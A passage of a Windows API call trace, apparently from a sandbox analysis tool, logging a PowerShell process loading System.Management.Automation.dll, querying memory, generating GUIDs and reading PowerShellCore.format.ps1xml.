	[0412.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.257] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.257] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.258] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.258] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.259] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x2e61ad30, Data2=0x3c2, Data3=0x4089, Data4=([0]=0xaf, [1]=0x3d, [2]=0xf, [3]=0x9d, [4]=0x4, [5]=0x98, [6]=0x5a, [7]=0xca))) returned 0x0
	[0412.260] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.260] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.261] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bba0, lpBuffer=0x20ca60, dwLength=0x30 | out: lpBuffer=0x20ca60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.262] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.263] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.263] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.263] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xe9df1d9, Data2=0xb620, Data3=0x42a7, Data4=([0]=0xb2, [1]=0xf4, [2]=0xb5, [3]=0x42, [4]=0xc2, [5]=0x18, [6]=0x4b, [7]=0x1f))) returned 0x0
	[0412.263] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.263] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.263] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.264] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.264] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.264] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.264] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.264] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.576] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20b860, lpBuffer=0x20c720, dwLength=0x30 | out: lpBuffer=0x20c720*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.577] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3aefda51, Data2=0x5607, Data3=0x4d11, Data4=([0]=0x9a, [1]=0x92, [2]=0xa7, [3]=0x37, [4]=0x21, [5]=0x9a, [6]=0xe7, [7]=0x67))) returned 0x0
	[0412.577] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x444e1f9c, Data2=0x8e5c, Data3=0x403a, Data4=([0]=0xb7, [1]=0x4b, [2]=0x3c, [3]=0x72, [4]=0xa5, [5]=0x7f, [6]=0x81, [7]=0x5d))) returned 0x0
	[0412.578] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xc7d8bf23, Data2=0x4359, Data3=0x4a4f, Data4=([0]=0xb0, [1]=0x44, [2]=0xa5, [3]=0x15, [4]=0x7c, [5]=0xd2, [6]=0xb2, [7]=0x3))) returned 0x0
	[0412.578] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x808aa48a, Data2=0xb212, Data3=0x4b27, Data4=([0]=0xb5, [1]=0x76, [2]=0xff, [3]=0xcc, [4]=0xc6, [5]=0xde, [6]=0x12, [7]=0xfc))) returned 0x0
	[0412.578] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x74e0d805, Data2=0x7bf1, Data3=0x4e6a, Data4=([0]=0x9b, [1]=0xf8, [2]=0x6a, [3]=0xba, [4]=0x7c, [5]=0x37, [6]=0x73, [7]=0x65))) returned 0x0
	[0412.578] VirtualQuery (in: lpAddress=0x20b970, lpBuffer=0x20c830, dwLength=0x30 | out: lpBuffer=0x20c830*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.578] VirtualQuery (in: lpAddress=0x20ba00, lpBuffer=0x20c8c0, dwLength=0x30 | out: lpBuffer=0x20c8c0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.578] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x7dfa145f, Data2=0xafe2, Data3=0x4485, Data4=([0]=0xa7, [1]=0xfa, [2]=0xbf, [3]=0xd4, [4]=0x66, [5]=0xc4, [6]=0x7a, [7]=0xb5))) returned 0x0
	[0412.578] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x5c5f0684, Data2=0x59a5, Data3=0x48e9, Data4=([0]=0xbb, [1]=0x4a, [2]=0xac, [3]=0x54, [4]=0xbc, [5]=0x51, [6]=0x13, [7]=0x6f))) returned 0x0
	[0412.578] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xd44bbfa1, Data2=0x507f, Data3=0x40e5, Data4=([0]=0xa8, [1]=0x22, [2]=0x16, [3]=0x59, [4]=0x91, [5]=0x3a, [6]=0xee, [7]=0x41))) returned 0x0
	[0412.579] SetErrorMode (uMode=0x1) returned 0x1
	[0412.579] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.579] SetErrorMode (uMode=0x1) returned 0x1
	[0412.579] GetFileType (hFile=0x2fc) returned 0x1
	[0412.579] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.579] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.579] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.579] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.579] ReadFile (in: hFile=0x2fc, lpBuffer=0x322d6f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x322d6f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
